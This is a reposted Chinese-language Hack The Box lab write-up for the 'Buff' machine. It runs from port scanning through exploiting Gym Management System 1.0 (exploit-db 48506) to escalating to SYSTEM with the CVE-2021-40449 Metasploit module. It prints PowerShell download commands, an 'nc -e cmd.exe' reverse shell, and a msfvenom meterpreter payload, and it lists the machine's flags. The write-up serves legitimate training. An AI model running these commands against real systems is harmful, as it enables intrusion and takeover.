HTB:Buff[WriteUP]
目录
USER_FLAG:ee3335d18df442d891d4f629540a840f
ROOT_FLAG:3a40c65e8215ee8b7d6c9b321eec287f
连接至HTB服务器并启动靶机
靶机IP:10.10.10.198
分配IP:10.10.16.7
信息搜集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.10.198 -r 1-65535 --ulimit 5000
使用nmap对靶机开放的端口进行脚本、服务扫描
nmap -p 7680,8080 -sCV 10.10.10.198
使用curl分别访问靶机的两个端口
curl -I http://10.10.10.198:7680
curl -I http://10.10.10.198:8080┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.10.198:7680
curl: (52) Empty reply from server
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.10.198:8080
HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 00:52:37 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Set-Cookie: sec_session_id=dum0rt5r6s2o7ksbai0g2rvhua; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: sec_session_id=tkr1qpofbvg8f3frujuksp9u0n; path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
使用浏览器访问靶机8080端口页面
点击Contact后,页面左侧显示WebAPP为:Gym Management System 1.0
漏洞利用
使用searchsploit搜索该WebAPP
searchsploit Gym Management
将其中未认证的RCE漏洞EXP拷贝到当前目录下
searchsploit -m 48506.py┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 48506.py
Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
URL: https://www.exploit-db.com/exploits/48506
Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/48506.py
通过python2利用该EXP成功getshell
python2 48506.py 'http://10.10.10.198:8080/'┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python2 48506.py 'http://10.10.10.198:8080/'
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNGbuff\shaun
但是进来后发现该EXP不仅无法切换到其他目录下而且基本功能无法运行
尝试往靶机上传一个netcat,首先开启一个http服务
python -m http.server 6666靶机将nc.exe文件进行下载
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://10.10.16.7:6666/nc.exe','nc.exe')"本地侧nc开始监听
nc -lvnp 1425靶机反弹shell回攻击机
nc -e cmd.exe 10.10.16.7 1425本地侧nc受到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.198] 49776
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun
查找user_flag位置并查看其内容
C:\xampp\htdocs\gym\upload>cd C:\
cd C:\C:\>dir /s user.txt
dir /s user.txt
Volume in drive C has no label.
Volume Serial Number is A22D-49F7Directory of C:\Users\shaun\Desktop
21/11/2024 00:38 34 user.txt
1 File(s) 34 bytesTotal Files Listed:
1 File(s) 34 bytes
0 Dir(s) 9,804,349,440 bytes freeC:\>type C:\Users\shaun\Desktop\user.txt
type C:\Users\shaun\Desktop\user.txt
ee3335d18df442d891d4f629540a840f
USER_FLAG:ee3335d18df442d891d4f629540a840f
特权提升
攻击机使用msfvenom生成一个msf马子
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f exe > shell.exe通过python再次启动http服务
python -m http.server 6666靶机将该木马进行下载
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://10.10.16.7:6666/shell.exe','shell.exe')"启动Metasploit
msfconsole使用监听模块
use exploit/multi/handler配置好选项:PAYLOAD、LHOST、LPORT
靶机运行木马后,本地MSF侧收到回显
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.7:4444
[*] Meterpreter session 1 opened (10.10.16.7:4444 -> 10.10.10.198:49782) at 2024-11-21 01:15:49 -0500meterpreter > getuid
Server username: BUFF\shaun
将该会话收起
background切换到提权扫描模块
use post/multi/recon/local_exploit_suggester配置好选项:SESSION
切换到提权模块
use exploit/windows/local/cve_2021_40449配置好选项:SESSION、PAYLOAD、LHOST、LPORT
msf6 exploit(windows/local/cve_2021_40449) > exploit
[*] Started reverse TCP handler on 10.10.16.7:4545
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1803 build detected!
[*] Launching netsh to host the DLL...
[+] Process 7264 launched.
[*] Reflectively injecting the DLL into 7264...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (10.10.16.7:4545 -> 10.10.10.198:49784) at 2024-11-21 01:25:57 -0500meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
切换到终端
shell查找root_flag位置并查看其内容
meterpreter > shell
Process 6576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.C:\>dir /s root.txt
dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is A22D-49F7Directory of C:\Users\Administrator\Desktop
21/11/2024 00:38 34 root.txt
1 File(s) 34 bytes
Total Files Listed:
1 File(s) 34 bytes
0 Dir(s) 9,801,760,768 bytes freeC:\>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
3a40c65e8215ee8b7d6c9b321eec287f
ROOT_FLAG:3a40c65e8215ee8b7d6c9b321eec287f
原文地址:https://blog.csdn.net/qq_43007452/article/details/143931431
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!